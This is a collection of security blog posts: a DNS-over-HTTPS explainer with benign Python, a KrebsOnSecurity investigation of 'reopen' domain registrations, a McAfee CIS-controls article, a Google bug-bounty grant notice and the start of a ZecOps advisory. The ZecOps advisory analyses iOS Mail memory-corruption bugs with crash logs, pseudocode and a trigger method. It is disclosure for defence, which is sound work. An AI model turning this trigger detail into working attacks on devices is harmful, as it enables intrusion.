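To make the “wrapping” concrete, here is an added example, not code from Webroot or from the article, that builds a DNS query in wire format and shows the two ways RFC 8484 carries it over HTTPS: base64url in a GET query string, or as the body of a POST with Content-Type application/dns-message. It then parses a resolver response. Nothing here touches the network; the resolver host name and the response bytes are constructed for the demonstration (the answer uses 192.0.2.1, a documentation address). The point it illustrates is that the message inside the HTTPS envelope is ordinary DNS, which is why DoH changes who can see the query without changing what the query means.

```python
import base64
import struct


def encode_name(name):
    """Encode "example.com" as DNS labels: \\x07example\\x03com\\x00."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += struct.pack("B", len(label)) + label.encode("ascii")
    return out + b"\x00"


def build_query(name, qtype=1):
    """Recursive query (RD set) for name/qtype, QCLASS IN. Message ID is 0, as RFC 8484
    recommends for the GET form so that HTTP caches can deduplicate identical queries."""
    header = struct.pack("!HHHHHH", 0, 0x0100, 1, 0, 0, 0)  # id, flags, QD, AN, NS, AR
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def doh_get_path(query, path="/dns-query"):
    """GET form: the wire message base64url-encoded without padding (RFC 8484 section 4.1)."""
    dns = base64.urlsafe_b64encode(query).rstrip(b"=").decode("ascii")
    return "%s?dns=%s" % (path, dns)


def doh_post_request(query, host, path="/dns-query"):
    """POST form: the raw wire message is the body. Returns (request head, body)."""
    head = ("POST %s HTTP/1.1\r\nHost: %s\r\n"
            "Content-Type: application/dns-message\r\nAccept: application/dns-message\r\n"
            "Content-Length: %d\r\n\r\n" % (path, host, len(query)))
    return head, query


def _skip_name(msg, off):
    """Advance past a possibly compressed name and return the offset after it."""
    while True:
        n = msg[off]
        if n == 0:
            return off + 1
        if n & 0xC0 == 0xC0:  # two-byte compression pointer terminates the name
            return off + 2
        off += 1 + n


def parse_a_records(msg):
    """Return the IPv4 addresses in the answer section of a DNS response."""
    _id, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    if not flags & 0x8000:
        raise ValueError("not a response (QR bit clear)")
    rcode = flags & 0x000F
    if rcode != 0:
        raise ValueError("resolver returned RCODE %d" % rcode)
    off = 12
    for _ in range(qd):
        off = _skip_name(msg, off) + 4  # skip QTYPE and QCLASS
    addrs = []
    for _ in range(an):
        off = _skip_name(msg, off)
        rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rclass == 1 and rdlen == 4:
            addrs.append(".".join(str(b) for b in rdata))
    return addrs


# Constructed response to build_query("example.com"): flags 0x8180 (QR, RD, RA), the question
# echoed back, and one A record whose name is a pointer to offset 12, TTL 300, address 192.0.2.1.
SAMPLE_RESPONSE = (struct.pack("!HHHHHH", 0, 0x8180, 1, 1, 0, 0)
                   + encode_name("example.com") + struct.pack("!HH", 1, 1)
                   + b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 300, 4) + bytes([192, 0, 2, 1]))

if __name__ == "__main__":
    q = build_query("example.com")
    print("GET", doh_get_path(q))
    head, body = doh_post_request(q, "resolver.example")
    print(head + repr(body))
    print(parse_a_records(SAMPLE_RESPONSE))
```

Everything an on-path observer previously saw in the clear (the name being asked for and the answer) is now the body of a TLS-protected HTTP exchange with one resolver; the flags and RCODE checks in parse_a_records are the same ones a client needs for plain DNS, because DoH does not vouch for the content of the answer.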

So, while the domain name system has served the internet and its users well for decades, the time may have come for a change.

“The creators of DNS, in their wildest dreams, imagined the system may be able to accommodate up to 50 million domains. We’re at 330 million now. It’s amazing what they achieved,” says Barnett. “But DNS needs to evolve. It’s been a great tool, but it wasn’t designed with privacy or security as a priority. DoH represents the logical evolution of DNS.”

Toward A DoH-Enabled Future

Some major technology players have already made the leap: Mozilla’s Firefox browser now uses DoH as its preferred method of resolving requests. Many companies, however, would prefer to retain control of DNS and are concerned about applications making their own, independent DNS requests. Losing that control can weaken security, since it limits an organisation’s ability to filter and inspect those requests.

As application developers strive for better privacy for their users and businesses look to improve security, a balance must be found. Webroot® DNS Protection has designed its agent to retain control of DNS requests, limiting whether individual applications can enable DoH on their own, while running each request through Webroot’s threat intelligence platform, so that both privacy and security are improved.

Its next release, expected in the coming months, will be fully compatible with the new DoH protocol in service to the security and privacy of its users.

The post DNS is on the Verge of a Major Overhaul appeared first on Webroot Blog.

Who’s Behind the “Reopen” Domain Surge?

The past few weeks have seen a large number of new domain registrations beginning with the word “reopen” and ending with U.S. city or state names. The largest number of them were created just hours after President Trump sent a series of all-caps tweets urging citizens to “liberate” themselves from new gun control measures and state leaders who’ve enacted strict social distancing restrictions in the face of the COVID-19 pandemic. Here’s a closer look at who and what appear to be behind these domains.

A series of inciteful tweets sent by President Trump on April 17, the same day dozens of state-themed “reopen” domains were registered — mostly by conservative groups and gun rights advocates.

KrebsOnSecurity began this research after reading a fascinating Reddit thread over the weekend on several “reopen” sites that seemed to be engaged in astroturfing, which involves masking the sponsors of a message or organization to make it appear as though it originates from and is supported by grassroots participants.

The Reddit discussion focused on a handful of new domains — including,, and — that appeared to be tied to various gun rights groups in those states. Their registrations have roughly coincided with contemporaneous demonstrations in Minnesota, California and Tennessee where people showed up to protest quarantine restrictions over the past few days.

A “reopen California” protest over the weekend in Huntington Beach, Calif. Image: Reddit.

Suspecting that these were but a subset of a larger corpus of similar domains registered for every state in the union, KrebsOnSecurity ran a domain search report at DomainTools [an advertiser on this site], requesting any and all domains registered in the past month that begin with “reopen” and end in “.com.”

That lookup returned approximately 150 domains; in addition to those named after the individual 50 states, some of the domains refer to large American cities or counties, and others to more general concepts, such as “” or “”

Many of the domains are still dormant, leading to parked pages and registration records obscured behind privacy protection services. But a review of other details about these domains suggests a majority of them are tied to various gun rights groups, state Republican Party organizations, and conservative think tanks, religious and advocacy groups.

For example, forwards to, but the site’s WHOIS registration records (obscured since the Reddit thread went viral) point to an individual living in Florida. That same Florida resident registered, a site that forwards to the Pennsylvania Firearms Association, and urges the state’s residents to contact their governor about easing the COVID-19 restrictions. is tied to a Facebook page called Pennsylvanians Against Excessive Quarantine, which sought to organize an “Operation Gridlock” protest at noon today in Pennsylvania among its 68,000 members.

Both the Minnesota and Pennsylvania gun advocacy sites include the same Google Analytics tracker in their source code: UA-60996284. A cursory Internet search on that code shows it also is present on and

More importantly, the same code shows up on a number of other anti-gun control sites registered by the Dorr Brothers, real-life brothers who have created nonprofits (in name only) across dozens of states that are so extreme in their stance they make the National Rifle Association look like a liberal group by comparison.

This 2019 article at quotes several 2nd Amendment advocates saying the Dorr brothers simply seek “to stir the pot and make as much animosity as they can, and then raise money off that animosity.” The site also is instructive here.

A number of other sites — such as — seem to exist merely to sell t-shirts, decals and yard signs with such slogans as “Know Your Rights,” “Live Free or Die,” and “Facts not Fear.” WHOIS records show the same Florida resident who registered this North Carolina site also registered one for New York — — just a few minutes later.

Merchandise available from

Some of the concept reopen domains — including (registered Apr. 15) and (Apr. 16) — trace back to FreedomWorks, a conservative group that the Associated Press says has been holding weekly virtual town halls with members of Congress, “igniting an activist base of thousands of supporters across the nation to back up the effort.” — which advocates for lifting social restrictions in Orange County, Calif. — links to a Facebook page for Orange County Republicans, and has been chronicling the street protests there. The messaging on — urging visitors to digitally sign a reopen petition to the state governor — is identical to the message on the Facebook page of the Horry County, SC Conservative Republicans. was registered on April 16 to In Pursuit of LLC, an Arlington, Va.-based conservative group with a number of former employees who currently work at the White House or in cabinet agencies. A 2016 story from USA Today says In Pursuit Of LLC is a for-profit communications agency launched by billionaire industrialist Charles Koch.

Many of the reopen sites that have redacted names and other information about their registrants nevertheless hold other clues, mainly based on precisely when they were registered. Each domain registration record includes a date and timestamp down to the second that the domain was registered. By grouping the timestamps for domains that have obfuscated registration details and comparing them to domains that do include ownership data, we can infer more information.

For example, more than 50 reopen domains were registered within an hour of each other on April 17 — between 3:25 p.m. ET and 4:43 ET. Most of these lack registration details, but a handful of them did (until the Reddit post went viral) include the registrant name Michael Murphy, the same name tied to the aforementioned Minnesota and Pennsylvania gun rights domains ( and that were registered within seconds of each other on April 8.

A large number of “reopen” domains were registered within the same one-hour period on April 17, and tie back to the same name used in the various reopen domains connected to gun rights groups. A link to the spreadsheet where this screen shot is drawn from is included below.

A Google spreadsheet documenting much of the domain information sourced in this story is available here.

No one responded to the email addresses and phone numbers tied to Mr. Murphy, who may or may not have been involved in this domain registration scheme. Those contact details suggest he runs a store in Florida that makes art out of reclaimed or discarded items.

Update, April 21, 6:40 a.m. ET: Mother Jones has published a compelling interview with Mr. Murphy, who says he registered thousands of dollars worth of “reopen” and “liberate” domains to keep them out of the hands of people trying to organize protests. KrebsOnSecurity has not been able to validate this report, but it’s a fascinating twist to this tale: How an ‘Old Hippie’ Got Accused of Astroturfing the Right-Wing Campaign to Reopen the Economy

Update, April 22, 1:52 p.m. ET: Mr. Murphy told he did not register or, contrary to data in the spreadsheet linked above. I looked up each of the records in that spreadsheet manually, but did have some help from another source in compiling and sorting the information. It is possible the registration data for those domains got transposed with and, which included Mr. Murphy’s information prior to being redacted by the domain registrar.

Original story:

As much as President Trump likes to refer to stories critical of him and his administration as “fake news,” this type of astroturfing is not only dangerous to public health, but it’s reminiscent of the playbook used by Russia to sow discord, create phony protest events, and spread disinformation across America in the lead-up to the 2016 election.

This entire astroturfing campaign also brings to mind a “local news” network called Local Government Information Services (LGIS), an organization founded in 2018 which operates a huge network of hundreds of sites that purport to be local news sites in various states. However, most of the content is generated by automated computer algorithms that consume data from reports released by U.S. executive branch federal agencies.

The relatively scarce actual bylined content on these LGIS sites is authored by freelancers who are in most cases nowhere near the localities they cover. Other content not drawn from government reports often repurposes press releases from conservative Web sites, including,, and The Heritage Foundation. For more on LGIS, check out the 2018 coverage from The Chicago Tribune and the Columbia Journalism Review.

Establishing Security Maturity Through CIS Cyber Defense Framework

Introduction – Choosing the Right Security Controls Framework

The cyber threat landscape is evolving at an astronomical rate; we are living in the age where the four key pillars of cybersecurity – Confidentiality, Integrity, Availability and Assurance of information systems – are no longer considered a nice-to-have but are a metric for the business resilience and operational existence of businesses across the globe.

In this blog we set out to see how choosing the correct security controls framework can go a long way in establishing a secure foundation, which then allows Enterprise security designers/decision makers to make more informed solution choices while selecting the controls and vendor architectures.

Organizations are increasingly finding themselves caught in the “security war of more”, where Governance, Risk and Compliance regimes, compounded by vendor solution fragmentation, have resulted in tick-box security. At times this has left organizations with either overlapping security capabilities or completely missing critical security controls. Adversaries continue to take advantage of this industry predicament, as depicted by the 4 billion records lost through data breaches and malware attacks in 2019 (Source: Verizon).

In order to win this battle, a structured and homogeneous approach must be constructed across the industry. This is where security frameworks come into the picture. Security control frameworks play a pivotal role: they can sit as a foundation across multiple law and compliance regimes to provide key capabilities for an organization. The CIS (Center for Internet Security) CSC (Critical Security Controls) framework provides just that: the fundamental underpinnings of a strong organizational cyber defense. This blog is a continuation of the CIS whitepaper published here, in which we introduce the CIS Controls and McAfee product capabilities.

CIS CSC provides a path for an organization to get started on its cyber defense program; it offers a starting point for organizations that do not know where to begin, and lets organizations at a mid-maturity level augment their capabilities to “Optimize and Execute” on their cybersecurity needs. CIS provides a list of Critical Security Controls that have been cherry-picked to be most effective against the most common attacks. It offers layered protection via a defense-in-depth approach to cybersecurity and has been developed using the first-hand experience of cyber defenders across industry verticals such as retail, manufacturing, healthcare and government.

The CIS CSC controls are based on a risk metric: each control is weighted by the likelihood and impact of an incident posing a significant threat to an Enterprise. The framework draws from the foundational elements of risk management and continuous protection, not only protecting against the initial compromise but also detecting and protecting against existing adversary activity within an environment. This gives an organization the flexibility to start its CIS CSC implementation at any point in its security lifecycle.

Architecting Enterprise Cyber Defense with CIS

This section highlights how the CIS controls secure an Enterprise using its layered defense in depth approach moving from the basic controls, which are mostly focused on endpoints, to the Enterprise boundary and then combining it through the People, Process and Technology triad at the organizational level.

The full list of CIS CSC controls and detailed mapping of our products can be found here. A similar document showing the usage of McAfee products to support the NIST 800-53 security controls is available here.

CIS Implementation Groups and Organizational Maturity

The CIS control framework offers mature organizations the opportunity to further enhance and optimize their controls by implementing the CIS sub-controls. The full list of 148 sub-controls can be found here. The sub-controls are grouped into 3 implementation groups. The implementation groups allow organizations to tailor the framework based on self-evaluation of their security maturity and the resources available to them. The CIS framework breaks the sub-controls into 3 groups:

Figure: CIS Implementation Groups – Source CIS

Each group builds on the previous group’s capabilities, e.g. IG2 builds upon the controls in IG1. The mapping of the controls to the needs and wants can be loosely tied together as follows:

Implementation Group 1: This group is mainly aimed at small businesses using commercial off the shelf software, data sensitivity requirements are usually very low.

Implementation Group 2: This group is aimed at the Enterprise storing sensitive business information and having reasonable cybersecurity resources for implementation of the controls.

Implementation Group 3: This group is mainly aimed as a defense against sophisticated adversaries such as Nation State actors utilizing Zero-day vulnerabilities.

McAfee’s Solution Architecture Aligned with CIS CSC Principles

The CSC controls leverage 6 key principles, and McAfee solutions and services address these principles effectively.

  1. Offense Informs Defense – It considers real-world adversary Tactics, Techniques and Procedures (TTPs), such as the ones catalogued in the MITRE ATT&CK Matrix, and establishes controls that have successfully defended against such adversary TTPs. Thus, each control offers tested capabilities that can be relied upon.

McAfee products such as MVISION EDR and ESM, and common threat intelligence services such as GTI, are continuously adapting to the latest adversarial tactics to detect and protect against both known and unknown threats, and implement the MITRE ATT&CK matrix to analyze and apply context to detected IOCs. MVISION Insights brings the Enterprise threat landscape into context by providing industry-specific intelligence on existing or developing attack campaigns.

  2. Prioritization – Organizations are grappling with a wide variety of attack surfaces as well as challenges around resources, so it is important for any Enterprise to establish priority in its defensive efforts, aka “We need to contain the fire which has the potential to burn down the house first, before saving the garden.”

McAfee solution architect teams have access to a wide variety of tools including CIS control assessment capabilities. This allows us to explore customer challenges within their Cloud, Endpoint or Enterprise perimeter and help identify gaps and risks in customer environments. The McAfee Professional Services team can deliver Security Operations (SecOps) maturity assessments and assist customers to develop, fine tune and build their SecOps capabilities. McAfee products also have built in assessment capabilities mapping your Enterprise security maturity to similar industry peers, i.e. the Cloud Security Advisor (CSA) within MVISION Cloud. The CSA allows you to map your cloud security maturity journey with guided recommendations.

  3. Metrics – Any security effort needs to provide clear quantitative and qualitative benefits that allow Business Owners to understand a business’s cyber risk profile and establish clear needs and wants. The metrics establish linguistic homogeneity across Business Owners, System Owners and external entities. By scoring the missing and existing controls and processes within an organization, a clear security baseline score can be calculated which, in turn, establishes the security maturity of the organization.

Several McAfee products allow customers to establish a consolidated view of their key security metrics, e.g.:

  • McAfee ePO – Provides several security dashboards that collect metrics from various ePO extensions. ePO Protection Workspace, for example, gives a single-pane-of-glass view across your device-to-cloud risk and threat metrics. Various built-in dashboards further leverage ePO extensions such as Policy Auditor and Application Control for establishing metrics around your software inventory and endpoint system integrity, thus providing metrics around CIS Controls 2 and 5.
  • McAfee ESM – Provides content packs that open normalized views of key metrics such as network or endpoint threat events, offers a way to easily visualize risk metrics associated with these assets, and closely aligns to the metric requirements around CIS 6, 16 and 19.
  • McAfee MVISION Cloud – MVISION Cloud provides key metrics around risks across your cloud SaaS, PaaS, IaaS, CaaS and FaaS, as well as risks originating from unsanctioned cloud services, thus closely aligning with the metric requirements for CIS 1, 2, 16 and 18 (refer to CIS Controls Within Cloud Infrastructure for further details).
  4. Continuous Diagnostics and Mitigation – Cyber threats are evolving continuously, so cybersecurity should be a continuous effort. Any implementation of security controls requires continuous validation in the context of the business processes, tools and people involved within the organization, and the CIS controls introduce mechanisms for effective continuous monitoring and risk reduction.

McAfee ePO, ESM, NSP and MVISION platforms, along with various SIA partner solutions, provide continuous monitoring, diagnostics and response capabilities for cyberthreats. For example, our integrated reference architecture for Shadow IT protection uses MVISION Cloud’s shadow IT cloud risk registry to discover potentially risky Enterprise cloud services and then utilizes service groups to update network defenses such as the McAfee Web Gateway, or other 3rd-party web filtering solutions, to block and protect users against those services. Similarly, we have integrated reference architectures that provide continuous risk detection and mitigation for Industrial Control Systems (ICS), phishing, threat-intelligence-based containment and many more, details of which are available through the Cyber Defense architecture workshops.

  5. Automation – Security automation is key to achieving scalability around threat detection, protection and response. Rapidly evolving IT environments such as Cloud and BYOD access require automated monitoring and continuous security event correlation and behavior analysis.

McAfee ESM, MVISION EDR, ATD and TIE, along with a combination of integrations with threat intelligence platforms such as MISP and ThreatQ and security orchestration tools such as Swimlane, provide an architecture that can deliver adaptive security in a constantly evolving threat landscape.

  6. Continuous Risk Mitigation – The CIS controls can provide the pillars for supporting many of the well-known risk management frameworks, such as the NIST RMF as documented in SP 800-37. The example below outlines the CIS controls as a foundation for the NIST RMF.

Figure: NIST RMF as supported by CIS CSC

CIS Controls Within Cloud Infrastructure

This section highlights the mapping and use cases for CIS within public cloud infrastructure. The CIS controls are largely applicable in the context of public, private and hybrid cloud infrastructures; the challenges appear around the shared responsibility model within public cloud infrastructure, where consumers must relinquish control over the underlying infrastructure and rely upon the Cloud Service Provider (CSP) to secure it.

The following table maps the CIS controls against their applicability across the 4 key Cloud Infrastructure categories of IaaS, SaaS, PaaS and FaaS.

Table 1: CIS Controls Coverage across Cloud Infrastructure

CIS and System Hardening

CIS benchmarks provide guidance on hardening of assets from device to the Cloud across over 140 technologies. These best practice guidelines allow organizations to configure these devices in the most secure configuration possible. The benchmarks also provide several pre-configured tools for baseline configuration analysis and continuous monitoring of the baselines to track any deviations. The CIS CAT tool can be used to perform post implementation analysis for further confirmation and measurements against an organization’s implementation of the CIS controls.

More details about the benchmarks can be found here:

McAfee solutions such as ePO, application control and MVISION Cloud provide features that leverage the CIS benchmarks to evaluate the security posture and provide a measurable metric for a customer.


In summary, the CIS controls provide a comprehensive framework for adaptable security based on the following core security concepts:

Figure 3: CIS Continuous Risk Mitigation Cycle

Thus, the framework delivers true security outcomes by focusing on business priorities and organizational resources, and by providing metrics for measurable risk reduction. By implementing the CIS controls, Enterprises can easily align to other frameworks such as GDPR, CCPA, HIPAA, PCI-DSS, etc.

McAfee is part of the CIS alliance, which allows us to use its frameworks within our products as well as offer our solutions through the CIS CyberMarket.


  1. CIS Controls
  2. CIS Cloud Companion Guide
  3. NIST RMF SP 800-37
  4. Verizon Data Breach Investigations Report

The post Establishing Security Maturity Through CIS Cyber Defense Framework appeared first on McAfee Blogs.

Research Grants to support Google VRP Bug Hunters during COVID-19

In 2015, we launched our Vulnerability Research Grant program, which allows us to recognize the time and efforts of security researchers, including the situations where they don't find any vulnerabilities. To support our community of security researchers and to help protect our users around the world during COVID-19, we are announcing a temporary expansion of our Vulnerability Research Grant efforts.

In light of new challenges caused by the coronavirus outbreak, we are expanding this initiative by creating a COVID-19 grant fund. As of today, every Google VRP Bug Hunter who submitted at least two remunerated reports from 2018 through April 2020 will be eligible for a $1,337 research grant. We are dedicating these grants to support our researchers during this time. We are committed to protecting our users and we want to encourage the research community to help us identify threats and to prevent potential vulnerabilities in our products.

We understand the individual challenges COVID-19 has placed on the research community are different for everyone and we hope that these grants will allow us to support our Bug Hunters during these uncertain times. Even though our grants are intended to recognize the efforts of our frequent researchers regardless of their results, as always, bugs found during the grant are eligible for regular rewards per the Vulnerability Reward Program (VRP) rules. We are aware that some of our partners might not be interested in monetary grants. In such cases, we will offer the option to donate the grant to an established COVID-19 related charity and within our discretion, will monetarily match these charitable donations.

For those of you who recently joined us or are planning to start, it’s never too late. We are committed to continue the Vulnerability Research Grant program throughout 2020, so stay tuned for future announcements and follow us on @GoogleVRP!

You’ve Got (0-click) Mail!

Impact & Key Details (TL;DR):

  • The vulnerability allows remote code execution and enables an attacker to remotely infect a device by sending emails that consume a significant amount of memory
  • The vulnerability does not necessarily require a large email – a regular email which is able to consume enough RAM would be sufficient. There are many ways to achieve such resource exhaustion, including RTF, multi-part and other methods
  • Both vulnerabilities were triggered in-the-wild
  • The vulnerability can be triggered before the entire email is downloaded, hence the email content won’t necessarily remain on the device
  • We are not dismissing the possibility that attackers may have deleted remaining emails following a successful attack
  • Vulnerability trigger on iOS 13: Unassisted (zero-click) attacks on iOS 13 when the Mail application is opened in the background
  • Vulnerability trigger on iOS 12: The attack requires a click on the email. The attack is triggered before the content is rendered, so the user won’t notice anything anomalous in the email itself
  • Unassisted attacks on iOS 12 can be triggered (aka zero click) if the attacker controls the mail server
  • The vulnerabilities have existed at least since iOS 6 (released September 2012, when the iPhone 5 was released)
  • The earliest triggers we have observed in the wild were on iOS 11.2.2 in January 2018

This post is the first part of a series – See post number 2


Multiple Vulnerabilities in MobileMail/Maild


Following a routine iOS Digital Forensics and Incident Response (DFIR) investigation, ZecOps found a number of suspicious events affecting the default Mail application on iOS dating as far back as January 2018. ZecOps analyzed these events and discovered an exploitable vulnerability affecting Apple’s iPhones and iPads. ZecOps detected multiple in-the-wild triggers of this vulnerability against enterprise users, VIPs and MSSPs over a prolonged period of time.

The attack consists of sending a specially crafted email to a victim’s mailbox, which triggers the vulnerability in the context of the MobileMail application on iOS 12 or maild on iOS 13. Based on ZecOps Research and Threat Intelligence, we surmise with high confidence that these vulnerabilities – in particular, the remote heap overflow – are widely exploited in the wild in targeted attacks by one or more advanced threat operators.

The suspected targets included:

  • Individuals from a Fortune 500 organization in North America
  • An executive from a carrier in Japan 
  • A VIP from Germany
  • MSSPs from Saudi Arabia and Israel
  • A Journalist in Europe
  • Suspected: An executive from a Swiss enterprise

A few of the suspicious events even included strings commonly used by hackers (e.g. 414141…4141) – see FAQ. After verifying that it wasn’t a red-team exercise, we validated that these strings were provided by the email sender. Notably, although the data confirms that the exploit emails were received and processed by the victims’ iOS devices, the corresponding emails that should have been received and stored on the mail server were missing. Therefore, we infer that these emails may have been deleted intentionally as part of the attack’s operational security cleanup measures.

We believe that these attacks are correlated with at least one nation-state threat operator, or a nation-state that purchased the exploit from a third-party researcher at Proof of Concept (POC) grade and used it ‘as-is’ or with minor modifications (hence the 4141..41 strings).

While ZecOps refrains from attributing these attacks to a specific threat actor, we are aware that at least one ‘hackers-for-hire’ organization is selling exploits using vulnerabilities that leverage email addresses as a main identifier.

We advise updating as soon as an iOS update is available.

Exploitation timeline

We are aware of multiple triggers in the wild that happened starting from Jan 2018, on iOS 11.2.2. It is likely that the same threat operators are actively abusing these vulnerabilities presently. It is possible that the attacker(s) were using this vulnerability even earlier. We have seen similarities between some of the suspected victims during triggers to these vulnerabilities.

Affected versions:

  • All tested iOS versions are vulnerable including iOS 13.4.1. 
  • Based on our data, these bugs were actively triggered on iOS 11.2.2 and potentially earlier.
  • iOS 6 and above are vulnerable. iOS 6 was released in 2012. Versions prior to iOS 6 might be vulnerable too but we haven’t checked earlier versions. At the time of iOS 6 release, iPhone 5 was in the market.

ZecOps Customers & Partners

ZecOps Gluon iOS DFIR customers can detect attacks leveraging MobileMail/maild vulnerabilities.

Thank you

Before we dive deeper, we would like to thank Apple’s product security and engineering team that delivered a beta patch to block these vulnerabilities from further abuse once deployed to GA.

Vulnerability Details

ZecOps found that the implementation of MFMutableData in the MIME library lacks error checking for the ftruncate() system call, which leads to an Out-Of-Bounds (OOB) write. We also found a way to trigger the OOB write without waiting for the ftruncate() system call to fail. In addition, we found a heap overflow that can be triggered remotely.

We are aware of remote triggers of both vulnerabilities in the wild. 

Both the OOB write bug and the heap overflow bug occur due to the same problem: not handling the return value of system calls correctly.

The remote bug can be triggered while processing the email as it is downloaded; in that scenario, the email does not get fully downloaded to the device as a result.

Affected Library: /System/Library/PrivateFrameworks/MIME.framework/MIME

Vulnerable function: -[MFMutableData appendBytes:length:]

Abnormal behavior once the vulnerabilities are exploited

Besides a temporary slowdown of the Mail application, users should not observe any other anomalous behavior. Following an exploit attempt (successful or unsuccessful) on iOS 12, users may notice a sudden crash of the Mail application.

On iOS 13, besides a temporary slowdown, it would not be noticeable. Failed attacks would not be noticeable on iOS 13 if another attack is carried out afterwards and deletes the email.

In failed attacks, the emails sent by the attacker would show the message “This message has no content.”, as seen in the picture below:

Crash Forensics Analysis

Part of one crash (out of multiple crashes) experienced by the user is as follows.

The crashed instruction was stnp x8, x9, [x3], which stores the values of x8 and x9 to the address held in x3; the crash occurred because that address, 0x000000013aa1c000, was invalid.

Thread 3 Crashed:
0   libsystem_platform.dylib      	0x000000019e671d88 _platform_memmove +88
       0x19e671d84 0x00008da8                
       0x19e671d88         stnp x8, x9, [x3]              
       0x19e671d8c         stnp x10, x11, [x3, #16]       
       0x19e671d90         add x3, x3, 0x20               
       0x19e671d94         ldnp x8, x9, [x1]              
1   MIME                          	0x00000001b034c4d8 -[MFMutableData appendBytes:length:] + 356 
2   Message                       	0x00000001b0b379c8 -[MFDAMessageContentConsumer consumeData:length:format:mailMessage:] + 808
x0: 0x000000013aa1b05a  x5: 0x0000000000000006
x1: 0x0000000102f0cfc6  x6: 0x0000000000000000
x2: 0x0000000000004a01  x7: 0x0000000000000000
x3: 0x000000013aa1c000  x8: 0x3661614331732f0a
x4: 0x000000000000004b  x9: 0x48575239734c314a

In order to find out why the process crashed, we need to take a look at the implementation of MFMutableData.

The call tree below is taken from the crash log experienced by only a selected number of devices.

-[MFDAMessageContentConsumer consumeData:length:format:mailMessage:] 
+--  -[MFMutableData appendData:]
   +--  -[MFMutableData appendBytes:length:]
       +-- memmove()

By analyzing the MIME library, the pseudo code of -[MFMutableData appendBytes:length:] is as follows:

- (void)appendBytes:(const void *)bytes length:(uint64_t)len {
    uint64_t new_length = old_length + len;
    [self setLength:new_length];   // may call _flushToDisk:capacity:, which calls ftruncate()
    if (!self->flush) {
        self->flush = true;
    }
    memmove(dest, bytes, len);     // writes into the mapped file regardless of whether it was extended
}

The following call stack was executed before the crash happened:

-[MFDAMessageContentConsumer consumeData:length:format:mailMessage:] 
+--  -[MFMutableData appendData:]
   +--  -[MFMutableData appendBytes:length:]
       +-- -[MFMutableData setLength:]
          +-- -[MFMutableData _flushToDisk:capacity:]
             +-- ftruncate()

A file is used to store the actual data once the data size reaches a threshold. When the data changes, the content and the size of the mapped file must be changed accordingly. The ftruncate() system call is called inside -[MFMutableData _flushToDisk:capacity:] to adjust the size of the mapped file.

The following is the pseudo code of -[MFMutableData _flushToDisk:capacity:]:

- (void)_flushToDisk:(uint64_t)length capacity:(uint64_t)capacity {
    boolean_t flush;
    if (self->path) {
        flush = self->flush;               // <- line [a]
    } else {
        flush = true;
    }
    if (flush) {                           // <- line [b]
        ftruncate(self->path, capacity);   // return value is never checked
        self->flush = false;
    }
}

The man page of ftruncate specifies:

ftruncate() and truncate() cause the file named by path, or referenced by fildes, to be truncated
(or extended) to length bytes in size. If the file size exceeds length, any extra data is discarded.
If the file size is smaller than length, the file is extended and filled with zeros to the indicated
length. The ftruncate() form requires the file to be open for writing.

A value of 0 is returned if the call succeeds. If the call fails a -1 is returned, and the global
variable errno specifies the error.

According to the man page, “If the call fails a -1 is returned, and the global variable errno specifies the error.” In other words, under certain conditions this system call fails to truncate (or extend) the file and returns an error code.

However, upon failure of the ftruncate() system call, _flushToDisk continues anyway. The mapped file is therefore not extended, yet execution still reaches the memmove() in appendBytes:length:, causing an out-of-bounds (OOB) write past the end of the mmap'd file.

Finding another trigger

We know that the crash was due to a failed ftruncate() system call. Does that mean we can do nothing but wait for the system call to fail?

Let’s take another look at the -[MFMutableData _flushToDisk:capacity:] function.

- (void)_flushToDisk:(uint64_t)length capacity:(uint64_t)capacity {
    boolean_t flush;
    if (self->path) {
        flush = self->flush;               //<-line [a]
    } else {
        flush = true;
    }
    if (flush) {                           //<-line [b]
        ftruncate(self->path, capacity);   // return value is never checked
        self->flush = false;
    }
    // ...
}

As you can see at line [b], the function checks whether the flush flag is true before calling ftruncate(). This means that if we can make the flush flag false at line [a], ftruncate() won't be executed at all.

If -[MFMutableData setLength:] (which sets flush to 0) is called before -[MFMutableData appendData:], ftruncate() is not executed because flush == 0, and the result is similar.

The following backtrace is a demonstration of a local POC. Combined with an additional vulnerability and/or a method to control the memory layout, this vulnerability could be triggered remotely, for example by controlling the selectors (as we have observed in other DFIR events as well as in the Google Project Zero blog post).

Thread 0 Crashed:
0   libsystem_platform.dylib      	0x00000001cc442d98 _platform_memmove  + 88
       0x1cc442d8c         stnp x14, x15, [x0, #16]       
       0x1cc442d90         subs x2, x2, 0x40              
       0x1cc442d94 0x00008db8    // 0x00000001cc44bf30 
       0x1cc442d98         stnp x8, x9, [x3]              
       0x1cc442d9c         stnp x10, x11, [x3, #16]       
       0x1cc442da0         add x3, x3, 0x20               
       0x1cc442da4         ldnp x8, x9, [x1]              

1   MIME                          	0x00000001ddbf0518 -[MFMutableData appendBytes:length:]  + 352
       0x1ddbf050c         mov x1, x20                    
       0x1ddbf0510         mov x2, x19                    
       0x1ddbf0514         bl 0x000498f4    // 0x00000001ddc39e08 
       0x1ddbf0518         ldp x29, x30, [sp, #80]        
       0x1ddbf051c         ldp x20, x19, [sp, #64]        
       0x1ddbf0520         ldp x22, x21, [sp, #48]        
       0x1ddbf0524         ldp x24, x23, [sp, #32]        

Although this is indeed a vulnerability that should be patched, we suspect that it was triggered by accident while the attackers were trying to exploit the following vulnerability.

2nd Vulnerability: Remote Heap Overflow in MFMutable

We continued our investigation into the suspicious remotely triggered events and determined that there is another vulnerability in the same area.

The backtrace can be seen as following:

-[MFDAMessageContentConsumer consumeData:length:format:mailMessage:] 
+--  -[MFMutableData appendData:]
   +--  -[MFMutableData appendBytes:length:]
       +-- -[MFMutableData _mapMutableData]

While analyzing the code flow, we determined the following:

  • The function -[MFDAMessageContentConsumer consumeData:length:format:mailMessage:] is called when downloading an email in raw MIME form, and is called repeatedly until the email has been downloaded in Exchange mode. It creates a new NSMutableData object and calls appendData: for any new streaming data that belongs to the same email/MIME message. For other protocols such as IMAP, -[MFConnection readLineIntoData:] is used instead, but the logic and the vulnerability are the same.
